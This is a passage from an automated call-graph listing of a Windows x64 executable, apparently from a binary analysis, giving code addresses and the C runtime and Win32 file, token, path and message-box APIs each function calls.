17941->17943 17944 7ff75aeada94 17942->17944 17943->17942 17945 7ff75aea487f 17944->17945 17946 7ff75aeadaad 17944->17946 17945->17697 17946->17945 17947 7ff75aeb26c0 45 API calls 17946->17947 17947->17945 17951 7ff75aeb6df8 17948->17951 17953 7ff75aeb6e5c 17951->17953 17952 7ff75ae9c5c0 _log10_special 8 API calls 17954 7ff75aeb012d 17952->17954 17953->17952 17954->17798 17956 7ff75aea107f 17955->17956 17957 7ff75aea106d 17955->17957 17959 7ff75aea108d 17956->17959 17964 7ff75aea10c9 17956->17964 17958 7ff75aea4f78 _set_fmode 11 API calls 17957->17958 17960 7ff75aea1072 17958->17960 17961 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 17959->17961 17962 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17960->17962 17963 7ff75aea107d 17961->17963 17962->17963 17963->17662 17965 7ff75aea1445 17964->17965 17967 7ff75aea4f78 _set_fmode 11 API calls 17964->17967 17965->17963 17966 7ff75aea4f78 _set_fmode 11 API calls 17965->17966 17968 7ff75aea16d9 17966->17968 17969 7ff75aea143a 17967->17969 17971 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17968->17971 17970 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17969->17970 17970->17965 17971->17963 17973 7ff75aea0774 17972->17973 18000 7ff75aea04d4 17973->18000 17975 7ff75aea078d 17975->17315 18012 7ff75aea042c 17976->18012 17980 7ff75ae9c8c0 17979->17980 17981 7ff75ae92930 GetCurrentProcessId 17980->17981 17982 7ff75ae91c80 49 API calls 17981->17982 17983 7ff75ae92979 17982->17983 18026 7ff75aea49f4 17983->18026 17988 7ff75ae91c80 49 API calls 17989 7ff75ae929ff 17988->17989 18056 7ff75ae92620 17989->18056 17992 7ff75ae9c5c0 _log10_special 8 API calls 17993 7ff75ae92a31 17992->17993 17993->17354 17995 7ff75aea0189 17994->17995 17996 7ff75ae91b89 17994->17996 17997 7ff75aea4f78 _set_fmode 11 API calls 17995->17997 17996->17353 17996->17354 17998 7ff75aea018e 17997->17998 17999 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 17998->17999 17999->17996 18001 7ff75aea053e 18000->18001 18002 7ff75aea04fe 18000->18002 18001->18002 18004 7ff75aea054a 18001->18004 18003 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18002->18003 18005 7ff75aea0525 18003->18005 18011 7ff75aea54dc EnterCriticalSection 18004->18011 18005->17975 18013 7ff75aea0456 18012->18013 18024 7ff75ae91a20 18012->18024 18014 7ff75aea04a2 18013->18014 18015 7ff75aea0465 memcpy_s 18013->18015 18013->18024 18025 7ff75aea54dc EnterCriticalSection 18014->18025 18018 7ff75aea4f78 _set_fmode 11 API calls 18015->18018 18020 7ff75aea047a 18018->18020 18022 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18020->18022 18022->18024 18024->17323 18024->17324 18030 7ff75aea4a4e 18026->18030 18027 7ff75aea4a73 18028 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18027->18028 18032 7ff75aea4a9d 18028->18032 18029 7ff75aea4aaf 18065 7ff75aea2c80 18029->18065 18030->18027 18030->18029 18035 7ff75ae9c5c0 _log10_special 8 API calls 18032->18035 18033 7ff75aea4b8c 18034 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18033->18034 18034->18032 18036 7ff75ae929c3 18035->18036 18044 7ff75aea51d0 18036->18044 18038 7ff75aea4bb0 18038->18033 18042 7ff75aea4bba 18038->18042 18039 7ff75aea4b61 18040 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18039->18040 18040->18032 18041 7ff75aea4b58 18041->18033 18041->18039 18043 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18042->18043 18043->18032 18045 7ff75aeab338 _set_fmode 11 API calls 18044->18045 18046 7ff75aea51e7 18045->18046 18047 7ff75aeaec08 _set_fmode 11 API calls 18046->18047 18050 7ff75aea5227 18046->18050 18053 7ff75ae929e5 18046->18053 18048 7ff75aea521c 18047->18048 18049 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18048->18049 18049->18050 18050->18053 18200 7ff75aeaec90 18050->18200 18053->17988 18054 7ff75aeaa970 _isindst 17 API calls 18055 7ff75aea526c 18054->18055 18057 7ff75ae9262f 18056->18057 18058 7ff75ae99400 2 API calls 18057->18058 18059 7ff75ae92660 18058->18059 18060 7ff75ae9266f MessageBoxW 18059->18060 18061 7ff75ae92683 MessageBoxA 18059->18061 18062 7ff75ae92690 18060->18062 18061->18062 18063 7ff75ae9c5c0 _log10_special 8 API calls 18062->18063 18064 7ff75ae926a0 18063->18064 18064->17992 18066 7ff75aea2cbe 18065->18066 18067 7ff75aea2cae 18065->18067 18068 7ff75aea2cf5 18066->18068 18069 7ff75aea2cc7 18066->18069 18070 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18067->18070 18068->18067 18072 7ff75aea2ced 18068->18072 18073 7ff75aea4830 45 API calls 18068->18073 18075 7ff75aea2fa4 18068->18075 18079 7ff75aea3610 18068->18079 18105 7ff75aea32d8 18068->18105 18135 7ff75aea2b60 18068->18135 18071 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18069->18071 18070->18072 18071->18072 18072->18033 18072->18038 18072->18039 18072->18041 18073->18068 18077 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18075->18077 18077->18067 18080 7ff75aea3652 18079->18080 18081 7ff75aea36c5 18079->18081 18082 7ff75aea36ef 18080->18082 18083 7ff75aea3658 18080->18083 18084 7ff75aea371f 18081->18084 18085 7ff75aea36ca 18081->18085 18152 7ff75aea1bc0 18082->18152 18092 7ff75aea365d 18083->18092 18096 7ff75aea372e 18083->18096 18084->18082 18084->18096 18103 7ff75aea3688 18084->18103 18086 7ff75aea36ff 18085->18086 18087 7ff75aea36cc 18085->18087 18159 7ff75aea17b0 18086->18159 18089 7ff75aea366d 18087->18089 18095 7ff75aea36db 18087->18095 18104 7ff75aea375d 18089->18104 18138 7ff75aea3f74 18089->18138 18092->18089 18094 7ff75aea36a0 18092->18094 18092->18103 18094->18104 18148 7ff75aea4430 18094->18148 18095->18082 18098 7ff75aea36e0 18095->18098 18096->18104 18166 7ff75aea1fd0 18096->18166 18100 7ff75aea45c8 37 API calls 18098->18100 18098->18104 18099 7ff75ae9c5c0 _log10_special 8 API calls 18101 7ff75aea39f3 18099->18101 18100->18103 18101->18068 18103->18104 18173 7ff75aeae8c8 18103->18173 18104->18099 18106 7ff75aea32e3 18105->18106 18107 7ff75aea32f9 18105->18107 18108 7ff75aea3652 18106->18108 18109 7ff75aea36c5 18106->18109 18111 7ff75aea3337 18106->18111 18110 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18107->18110 18107->18111 18112 7ff75aea36ef 18108->18112 18113 7ff75aea3658 18108->18113 18114 7ff75aea371f 18109->18114 18115 7ff75aea36ca 18109->18115 18110->18111 18111->18068 18118 7ff75aea1bc0 38 API calls 18112->18118 18122 7ff75aea365d 18113->18122 18126 7ff75aea372e 18113->18126 18114->18112 18114->18126 18133 7ff75aea3688 18114->18133 18116 7ff75aea36ff 18115->18116 18117 7ff75aea36cc 18115->18117 18120 7ff75aea17b0 38 API calls 18116->18120 18119 7ff75aea366d 18117->18119 18124 7ff75aea36db 18117->18124 18118->18133 18121 7ff75aea3f74 47 API calls 18119->18121 18134 7ff75aea375d 18119->18134 18120->18133 18121->18133 18122->18119 18125 7ff75aea36a0 18122->18125 18122->18133 18123 7ff75aea1fd0 38 API calls 18123->18133 18124->18112 18128 7ff75aea36e0 18124->18128 18127 7ff75aea4430 47 API calls 18125->18127 18125->18134 18126->18123 18126->18134 18127->18133 18130 7ff75aea45c8 37 API calls 18128->18130 18128->18134 18129 7ff75ae9c5c0 _log10_special 8 API calls 18131 7ff75aea39f3 18129->18131 18130->18133 18131->18068 18132 7ff75aeae8c8 47 API calls 18132->18133 18133->18132 18133->18134 18134->18129 18183 7ff75aea0d84 18135->18183 18139 7ff75aea3f96 18138->18139 18140 7ff75aea0bf0 12 API calls 18139->18140 18141 7ff75aea3fde 18140->18141 18142 7ff75aeae5e0 46 API calls 18141->18142 18144 7ff75aea40b1 18142->18144 18143 7ff75aea40d3 18146 7ff75aea4830 45 API calls 18143->18146 18147 7ff75aea415c 18143->18147 18144->18143 18145 7ff75aea4830 45 API calls 18144->18145 18145->18143 18146->18147 18147->18103 18149 7ff75aea4448 18148->18149 18151 7ff75aea44b0 18148->18151 18150 7ff75aeae8c8 47 API calls 18149->18150 18149->18151 18150->18151 18151->18103 18153 7ff75aea1bf3 18152->18153 18154 7ff75aea1c22 18153->18154 18156 7ff75aea1cdf 18153->18156 18155 7ff75aea0bf0 12 API calls 18154->18155 18158 7ff75aea1c5f 18154->18158 18155->18158 18157 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18156->18157 18157->18158 18158->18103 18161 7ff75aea17e3 18159->18161 18160 7ff75aea1812 18162 7ff75aea0bf0 12 API calls 18160->18162 18165 7ff75aea184f 18160->18165 18161->18160 18163 7ff75aea18cf 18161->18163 18162->18165 18164 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18163->18164 18164->18165 18165->18103 18167 7ff75aea2003 18166->18167 18168 7ff75aea2032 18167->18168 18170 7ff75aea20ef 18167->18170 18169 7ff75aea0bf0 12 API calls 18168->18169 18172 7ff75aea206f 18168->18172 18169->18172 18171 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18170->18171 18171->18172 18172->18103 18174 7ff75aeae8f0 18173->18174 18175 7ff75aeae935 18174->18175 18176 7ff75aea4830 45 API calls 18174->18176 18179 7ff75aeae8f5 memcpy_s 18174->18179 18182 7ff75aeae91e memcpy_s 18174->18182 18178 7ff75aeb0858 WideCharToMultiByte 18175->18178 18175->18179 18175->18182 18176->18175 18177 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18177->18179 18180 7ff75aeaea11 18178->18180 18179->18103 18180->18179 18181 7ff75aeaea26 GetLastError 18180->18181 18181->18179 18181->18182 18182->18177 18182->18179 18184 7ff75aea0db1 18183->18184 18185 7ff75aea0dc3 18183->18185 18186 7ff75aea4f78 _set_fmode 11 API calls 18184->18186 18188 7ff75aea0dd0 18185->18188 18191 7ff75aea0e0d 18185->18191 18187 7ff75aea0db6 18186->18187 18189 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18187->18189 18190 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 18188->18190 18196 7ff75aea0dc1 18189->18196 18190->18196 18192 7ff75aea0eb6 18191->18192 18194 7ff75aea4f78 _set_fmode 11 API calls 18191->18194 18193 7ff75aea4f78 _set_fmode 11 API calls 18192->18193 18192->18196 18195 7ff75aea0f60 18193->18195 18197 7ff75aea0eab 18194->18197 18199 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18195->18199 18196->18068 18198 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18197->18198 18198->18192 18199->18196 18203 7ff75aeaecad 18200->18203 18201 7ff75aeaecb2 18202 7ff75aea4f78 _set_fmode 11 API calls 18201->18202 18205 7ff75aea524d 18201->18205 18208 7ff75aeaecbc 18202->18208 18203->18201 18203->18205 18206 7ff75aeaecfc 18203->18206 18204 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18204->18205 18205->18053 18205->18054 18206->18205 18207 7ff75aea4f78 _set_fmode 11 API calls 18206->18207 18207->18208 18208->18204 18210 7ff75aea82b5 18209->18210 18211 7ff75aea82c8 18209->18211 18212 7ff75aea4f78 _set_fmode 11 API calls 18210->18212 18219 7ff75aea7f2c 18211->18219 18214 7ff75aea82ba 18212->18214 18216 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18214->18216 18217 7ff75aea82c6 18216->18217 18217->17374 18226 7ff75aeb0348 EnterCriticalSection 18219->18226 18228 7ff75ae987a1 GetTokenInformation 18227->18228 18229 7ff75ae98823 __std_exception_destroy 18227->18229 18230 7ff75ae987c2 GetLastError 18228->18230 18233 7ff75ae987cd 18228->18233 18231 7ff75ae98836 CloseHandle 18229->18231 18232 7ff75ae9883c 18229->18232 18230->18229 18230->18233 18231->18232 18232->17379 18233->18229 18234 7ff75ae987e9 GetTokenInformation 18233->18234 18234->18229 18235 7ff75ae9880c 18234->18235 18235->18229 18236 7ff75ae98816 ConvertSidToStringSidW 18235->18236 18236->18229 18238 7ff75ae9c8c0 18237->18238 18239 7ff75ae92b74 GetCurrentProcessId 18238->18239 18240 7ff75ae926b0 48 API calls 18239->18240 18241 7ff75ae92bc7 18240->18241 18242 7ff75aea4c48 48 API calls 18241->18242 18243 7ff75ae92c10 MessageBoxW 18242->18243 18244 7ff75ae9c5c0 _log10_special 8 API calls 18243->18244 18245 7ff75ae92c40 18244->18245 18245->17389 18247 7ff75ae925e5 18246->18247 18248 7ff75aea4c48 48 API calls 18247->18248 18249 7ff75ae92604 18248->18249 18249->17405 18285 7ff75aea8804 18250->18285 18254 7ff75ae981cc 18253->18254 18255 7ff75ae99400 2 API calls 18254->18255 18256 7ff75ae981eb 18255->18256 18257 7ff75ae981f3 18256->18257 18258 7ff75ae98206 ExpandEnvironmentStringsW 18256->18258 18260 7ff75ae92810 49 API calls 18257->18260 18259 7ff75ae9822c __std_exception_destroy 18258->18259 18262 7ff75ae98230 18259->18262 18263 7ff75ae98243 18259->18263 18261 7ff75ae981ff __std_exception_destroy 18260->18261 18326 7ff75aeb15c8 18285->18326 18385 7ff75aeb1340 18326->18385 18406 7ff75aeb0348 EnterCriticalSection 18385->18406 18416 7ff75ae9455a 18415->18416 18417 7ff75ae99400 2 API calls 18416->18417 18418 7ff75ae9457f 18417->18418 18419 7ff75ae9c5c0 _log10_special 8 API calls 18418->18419 18420 7ff75ae945a7 18419->18420 18420->17442 18422 7ff75ae97e1e 18421->18422 18423 7ff75ae91c80 49 API calls 18422->18423 18424 7ff75ae97f42 18422->18424 18429 7ff75ae97ea5 18423->18429 18425 7ff75ae9c5c0 _log10_special 8 API calls 18424->18425 18426 7ff75ae97f73 18425->18426 18426->17442 18427 7ff75ae91c80 49 API calls 18427->18429 18428 7ff75ae94550 10 API calls 18428->18429 18429->18424 18429->18427 18429->18428 18430 7ff75ae99400 2 API calls 18429->18430 18431 7ff75ae97f13 CreateDirectoryW 18430->18431 18431->18424 18431->18429 18433 7ff75ae91613 18432->18433 18434 7ff75ae91637 18432->18434 18553 7ff75ae91050 18433->18553 18435 7ff75ae945b0 108 API calls 18434->18435 18437 7ff75ae9164b 18435->18437 18440 7ff75ae91682 18437->18440 18441 7ff75ae91653 18437->18441 18438 7ff75ae91618 18439 7ff75ae9162e 18438->18439 18442 7ff75ae92710 54 API calls 18438->18442 18439->17442 18444 7ff75ae945b0 108 API calls 18440->18444 18443 7ff75aea4f78 _set_fmode 11 API calls 18441->18443 18442->18439 18445 7ff75ae91658 18443->18445 18446 7ff75ae91696 18444->18446 18447 7ff75ae92910 54 API calls 18445->18447 18448 7ff75ae916b8 18446->18448 18449 7ff75ae9169e 18446->18449 18451 7ff75ae91671 18447->18451 18450 7ff75aea0744 73 API calls 18448->18450 18452 7ff75ae92710 54 API calls 18449->18452 18454 7ff75ae916cd 18450->18454 18451->17442 18453 7ff75ae916ae 18452->18453 18481 7ff75ae9717b 18480->18481 18483 7ff75ae97134 18480->18483 18481->17442 18483->18481 18617 7ff75aea5094 18483->18617 18485 7ff75ae94191 18484->18485 18486 7ff75ae944d0 49 API calls 18485->18486 18487 7ff75ae941cb 18486->18487 18488 7ff75ae944d0 49 API calls 18487->18488 18489 7ff75ae941db 18488->18489 18490 7ff75ae9422c 18489->18490 18491 7ff75ae941fd 18489->18491 18493 7ff75ae94100 51 API calls 18490->18493 18632 7ff75ae94100 18491->18632 18494 7ff75ae9422a 18493->18494 18495 7ff75ae94257 18494->18495 18496 7ff75ae9428c 18494->18496 18497 7ff75ae94100 51 API calls 18496->18497 18529 7ff75ae91c80 49 API calls 18528->18529 18530 7ff75ae94464 18529->18530 18530->17442 18554 7ff75ae945b0 108 API calls 18553->18554 18555 7ff75ae9108c 18554->18555 18556 7ff75ae91094 18555->18556 18557 7ff75ae910a9 18555->18557 18558 7ff75ae92710 54 API calls 18556->18558 18559 7ff75aea0744 73 API calls 18557->18559 18564 7ff75ae910a4 __std_exception_destroy 18558->18564 18560 7ff75ae910bf 18559->18560 18561 7ff75ae910c3 18560->18561 18562 7ff75ae910e6 18560->18562 18563 7ff75aea4f78 _set_fmode 11 API calls 18561->18563 18566 7ff75ae91122 18562->18566 18567 7ff75ae910f7 18562->18567 18565 7ff75ae910c8 18563->18565 18564->18438 18570 7ff75ae91129 18566->18570 18571 7ff75ae9113c 18566->18571 18569 7ff75aea4f78 _set_fmode 11 API calls 18567->18569 18618 7ff75aea50a1 18617->18618 18619 7ff75aea50ce 18617->18619 18621 7ff75aea4f78 _set_fmode 11 API calls 18618->18621 18629 7ff75aea5058 18618->18629 18620 7ff75aea50f1 18619->18620 18623 7ff75aea510d 18619->18623 18622 7ff75aea4f78 _set_fmode 11 API calls 18620->18622 18624 7ff75aea50ab 18621->18624 18626 7ff75aea50f6 18622->18626 18627 7ff75aea4fbc 45 API calls 18623->18627 18625 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18624->18625 18628 7ff75aea50b6 18625->18628 18630 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18626->18630 18631 7ff75aea5101 18627->18631 18628->18483 18629->18483 18630->18631 18631->18483 18633 7ff75ae94126 18632->18633 18634 7ff75aea49f4 49 API calls 18633->18634 18635 7ff75ae9414c 18634->18635 18696 7ff75aea5f38 18695->18696 18697 7ff75aea5f5e 18696->18697 18699 7ff75aea5f91 18696->18699 18698 7ff75aea4f78 _set_fmode 11 API calls 18697->18698 18700 7ff75aea5f63 18698->18700 18701 7ff75aea5fa4 18699->18701 18702 7ff75aea5f97 18699->18702 18703 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 18700->18703 18714 7ff75aeaac98 18701->18714 18704 7ff75aea4f78 _set_fmode 11 API calls 18702->18704 18706 7ff75ae94606 18703->18706 18704->18706 18706->17467 18727 7ff75aeb0348 EnterCriticalSection 18714->18727 19087 7ff75aea7968 19086->19087 19090 7ff75aea7444 19087->19090 19089 7ff75aea7981 19089->17477 19091 7ff75aea745f 19090->19091 19092 7ff75aea748e 19090->19092 19094 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 19091->19094 19100 7ff75aea54dc EnterCriticalSection 19092->19100 19096 7ff75aea747f 19094->19096 19096->19089 19102 7ff75ae9fee1 19101->19102 19103 7ff75ae9feb3 19101->19103 19106 7ff75ae9fed3 19102->19106 19111 7ff75aea54dc EnterCriticalSection 19102->19111 19104 7ff75aeaa884 _invalid_parameter_noinfo 37 API calls 19103->19104 19104->19106 19106->17481 19113 7ff75ae945b0 108 API calls 19112->19113 19114 7ff75ae91493 19113->19114 19115 7ff75ae9149b 19114->19115 19116 7ff75ae914bc 19114->19116 19117 7ff75ae92710 54 API calls 19115->19117 19118 7ff75aea0744 73 API calls 19116->19118 19119 7ff75ae914ab 19117->19119 19120 7ff75ae914d1 19118->19120 19119->17507 19121 7ff75ae914d5 19120->19121 19124 7ff75ae914f8 19120->19124 19219 7ff75ae96365 19218->19219 19220 7ff75ae91c80 49 API calls 19219->19220 19221 7ff75ae963a1 19220->19221 19222 7ff75ae963aa 19221->19222 19223 7ff75ae963cd 19221->19223 19224 7ff75ae92710 54 API calls 19222->19224 19225 7ff75ae94620 49 API calls 19223->19225 19241 7ff75ae963c3 19224->19241 19226 7ff75ae963e5 19225->19226 19227 7ff75ae96403 19226->19227 19228 7ff75ae92710 54 API calls 19226->19228 19229 7ff75ae94550 10 API calls 19227->19229 19228->19227 19231 7ff75ae9640d 19229->19231 19230 7ff75ae9c5c0 _log10_special 8 API calls 19232 7ff75ae9336e 19230->19232 19232->17581 19249 7ff75ae964f0 19232->19249 19241->19230 19398 7ff75ae953f0 19249->19398 19932 7ff75aeb1720 19943 7ff75aeb7454 19932->19943 19945 7ff75aeb7461 19943->19945 19944 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19944->19945 19945->19944 19946 7ff75aeb747d 19945->19946 19947 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19946->19947 19948 7ff75aeb1729 19946->19948 19947->19946 19949 7ff75aeb0348 EnterCriticalSection 19948->19949 16143 7ff75aea5698 16144 7ff75aea56cf 16143->16144 16145 7ff75aea56b2 16143->16145 16144->16145 16147 7ff75aea56e2 CreateFileW 16144->16147 16194 7ff75aea4f58 16145->16194 16149 7ff75aea5716 16147->16149 16150 7ff75aea574c 16147->16150 16168 7ff75aea57ec GetFileType 16149->16168 16197 7ff75aea5c74 16150->16197 16152 7ff75aea4f78 _set_fmode 11 API calls 16155 7ff75aea56bf 16152->16155 16159 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16155->16159 16157 7ff75aea5780 16223 7ff75aea5a34 16157->16223 16158 7ff75aea5755 16218 7ff75aea4eec 16158->16218 16163 7ff75aea56ca 16159->16163 16160 7ff75aea5741 CloseHandle 16160->16163 16161 7ff75aea572b CloseHandle 16161->16163 16167 7ff75aea575f 16167->16163 16169 7ff75aea58f7 16168->16169 16170 7ff75aea583a 16168->16170 16172 7ff75aea58ff 16169->16172 16173 7ff75aea5921 16169->16173 16171 7ff75aea5866 GetFileInformationByHandle 16170->16171 16174 7ff75aea5b70 21 API calls 16170->16174 16175 7ff75aea588f 16171->16175 16176 7ff75aea5912 GetLastError 16171->16176 16172->16176 16177 7ff75aea5903 16172->16177 16178 7ff75aea5944 PeekNamedPipe 16173->16178 16193 7ff75aea58e2 16173->16193 16179 7ff75aea5854 16174->16179 16180 7ff75aea5a34 51 API calls 16175->16180 16182 7ff75aea4eec _fread_nolock 11 API calls 16176->16182 16181 7ff75aea4f78 _set_fmode 11 API calls 16177->16181 16178->16193 16179->16171 16179->16193 16184 7ff75aea589a 16180->16184 16181->16193 16182->16193 16183 7ff75ae9c5c0 _log10_special 8 API calls 16185 7ff75aea5724 16183->16185 16240 7ff75aea5994 16184->16240 16185->16160 16185->16161 16188 7ff75aea5994 10 API calls 16189 7ff75aea58b9 16188->16189 16190 7ff75aea5994 10 API calls 16189->16190 16191 7ff75aea58ca 16190->16191 16192 7ff75aea4f78 _set_fmode 11 API calls 16191->16192 16191->16193 16192->16193 16193->16183 16195 7ff75aeab338 _set_fmode 11 API calls 16194->16195 16196 7ff75aea4f61 16195->16196 16196->16152 16198 7ff75aea5caa 16197->16198 16199 7ff75aea4f78 _set_fmode 11 API calls 16198->16199 16217 7ff75aea5d42 __std_exception_destroy 16198->16217 16201 7ff75aea5cbc 16199->16201 16200 7ff75ae9c5c0 _log10_special 8 API calls 16202 7ff75aea5751 16200->16202 16203 7ff75aea4f78 _set_fmode 11 API calls 16201->16203 16202->16157 16202->16158 16204 7ff75aea5cc4 16203->16204 16247 7ff75aea7e78 16204->16247 16206 7ff75aea5cd9 16207 7ff75aea5ce1 16206->16207 16208 7ff75aea5ceb 16206->16208 16209 7ff75aea4f78 _set_fmode 11 API calls 16207->16209 16210 7ff75aea4f78 _set_fmode 11 API calls 16208->16210 16213 7ff75aea5ce6 16209->16213 16211 7ff75aea5cf0 16210->16211 16212 7ff75aea4f78 _set_fmode 11 API calls 16211->16212 16211->16217 16214 7ff75aea5cfa 16212->16214 16215 7ff75aea5d34 GetDriveTypeW 16213->16215 16213->16217 16216 7ff75aea7e78 45 API calls 16214->16216 16215->16217 16216->16213 16217->16200 16219 7ff75aeab338 _set_fmode 11 API calls 16218->16219 16220 7ff75aea4ef9 Concurrency::details::SchedulerProxy::DeleteThis 16219->16220 16221 7ff75aeab338 _set_fmode 11 API calls 16220->16221 16222 7ff75aea4f1b 16221->16222 16222->16167 16225 7ff75aea5a5c 16223->16225 16224 7ff75aea578d 16233 7ff75aea5b70 16224->16233 16225->16224 16341 7ff75aeaf794 16225->16341 16227 7ff75aea5af0 16227->16224 16228 7ff75aeaf794 51 API calls 16227->16228 16229 7ff75aea5b03 16228->16229 16229->16224 16230 7ff75aeaf794 51 API calls 16229->16230 16231 7ff75aea5b16 16230->16231 16231->16224 16232 7ff75aeaf794 51 API calls 16231->16232 16232->16224 16234 7ff75aea5b8a 16233->16234 16235 7ff75aea5bc1 16234->16235 16236 7ff75aea5b9a 16234->16236 16237 7ff75aeaf628 21 API calls 16235->16237 16238 7ff75aea4eec _fread_nolock 11 API calls 16236->16238 16239 7ff75aea5baa 16236->16239 16237->16239 16238->16239 16239->16167 16241 7ff75aea59b0 16240->16241 16242 7ff75aea59bd FileTimeToSystemTime 16240->16242 16241->16242 16244 7ff75aea59b8 16241->16244 16243 7ff75aea59d1 SystemTimeToTzSpecificLocalTime 16242->16243 16242->16244 16243->16244 16245 7ff75ae9c5c0 _log10_special 8 API calls 16244->16245 16246 7ff75aea58a9 16245->16246 16246->16188 16248 7ff75aea7f02 16247->16248 16249 7ff75aea7e94 16247->16249 16284 7ff75aeb0830 16248->16284 16249->16248 16251 7ff75aea7e99 16249->16251 16252 7ff75aea7eb1 16251->16252 16253 7ff75aea7ece 16251->16253 16259 7ff75aea7c48 GetFullPathNameW 16252->16259 16267 7ff75aea7cbc GetFullPathNameW 16253->16267 16258 7ff75aea7ec6 __std_exception_destroy 16258->16206 16260 7ff75aea7c84 16259->16260 16261 7ff75aea7c6e GetLastError 16259->16261 16264 7ff75aea4f78 _set_fmode 11 API calls 16260->16264 16266 7ff75aea7c80 16260->16266 16262 7ff75aea4eec _fread_nolock 11 API calls 16261->16262 16263 7ff75aea7c7b 16262->16263 16265 7ff75aea4f78 _set_fmode 11 API calls 16263->16265 16264->16266 16265->16266 16266->16258 16268 7ff75aea7cef GetLastError 16267->16268 16269 7ff75aea7d05 __std_exception_destroy 16267->16269 16270 7ff75aea4eec _fread_nolock 11 API calls 16268->16270 16273 7ff75aea7d01 16269->16273 16274 7ff75aea7d5f GetFullPathNameW 16269->16274 16271 7ff75aea7cfc 16270->16271 16272 7ff75aea4f78 _set_fmode 11 API calls 16271->16272 16272->16273 16275 7ff75aea7d94 16273->16275 16274->16268 16274->16273 16279 7ff75aea7e08 memcpy_s 16275->16279 16280 7ff75aea7dbd memcpy_s 16275->16280 16276 7ff75aea7df1 16277 7ff75aea4f78 _set_fmode 11 API calls 16276->16277 16278 7ff75aea7df6 16277->16278 16281 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16278->16281 16279->16258 16280->16276 16280->16279 16282 7ff75aea7e2a 16280->16282 16281->16279 16282->16279 16283 7ff75aea4f78 _set_fmode 11 API calls 16282->16283 16283->16278 16287 7ff75aeb0640 16284->16287 16288 7ff75aeb0682 16287->16288 16289 7ff75aeb066b 16287->16289 16290 7ff75aeb0686 16288->16290 16291 7ff75aeb06a7 16288->16291 16292 7ff75aea4f78 _set_fmode 11 API calls 16289->16292 16313 7ff75aeb07ac 16290->16313 16325 7ff75aeaf628 16291->16325 16293 7ff75aeb0670 16292->16293 16298 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16293->16298 16297 7ff75aeb06ac 16301 7ff75aeb0751 16297->16301 16302 7ff75aeb06d3 16297->16302 16312 7ff75aeb067b __std_exception_destroy 16298->16312 16299 7ff75aeb068f 16300 7ff75aea4f58 _fread_nolock 11 API calls 16299->16300 16303 7ff75aeb0694 16300->16303 16301->16289 16304 7ff75aeb0759 16301->16304 16309 7ff75aea7cbc 14 API calls 16302->16309 16306 7ff75aea4f78 _set_fmode 11 API calls 16303->16306 16307 7ff75aea7c48 13 API calls 16304->16307 16305 7ff75ae9c5c0 _log10_special 8 API calls 16308 7ff75aeb07a1 16305->16308 16306->16293 16307->16312 16308->16258 16310 7ff75aeb0717 16309->16310 16311 7ff75aea7d94 37 API calls 16310->16311 16310->16312 16311->16312 16312->16305 16314 7ff75aeb07f6 16313->16314 16315 7ff75aeb07c6 16313->16315 16316 7ff75aeb0801 GetDriveTypeW 16314->16316 16317 7ff75aeb07e1 16314->16317 16318 7ff75aea4f58 _fread_nolock 11 API calls 16315->16318 16316->16317 16321 7ff75ae9c5c0 _log10_special 8 API calls 16317->16321 16319 7ff75aeb07cb 16318->16319 16320 7ff75aea4f78 _set_fmode 11 API calls 16319->16320 16322 7ff75aeb07d6 16320->16322 16323 7ff75aeb068b 16321->16323 16324 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16322->16324 16323->16297 16323->16299 16324->16317 16339 7ff75aeba540 16325->16339 16328 7ff75aeaf675 16331 7ff75ae9c5c0 _log10_special 8 API calls 16328->16331 16329 7ff75aeaf69c 16330 7ff75aeaec08 _set_fmode 11 API calls 16329->16330 16332 7ff75aeaf6ab 16330->16332 16333 7ff75aeaf709 16331->16333 16334 7ff75aeaf6b5 GetCurrentDirectoryW 16332->16334 16335 7ff75aeaf6c4 16332->16335 16333->16297 16334->16335 16336 7ff75aeaf6c9 16334->16336 16337 7ff75aea4f78 _set_fmode 11 API calls 16335->16337 16338 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16336->16338 16337->16336 16338->16328 16340 7ff75aeaf65e GetCurrentDirectoryW 16339->16340 16340->16328 16340->16329 16342 7ff75aeaf7a1 16341->16342 16343 7ff75aeaf7c5 16341->16343 16342->16343 16344 7ff75aeaf7a6 16342->16344 16346 7ff75aeaf7ff 16343->16346 16347 7ff75aeaf81e 16343->16347 16345 7ff75aea4f78 _set_fmode 11 API calls 16344->16345 16348 7ff75aeaf7ab 16345->16348 16349 7ff75aea4f78 _set_fmode 11 API calls 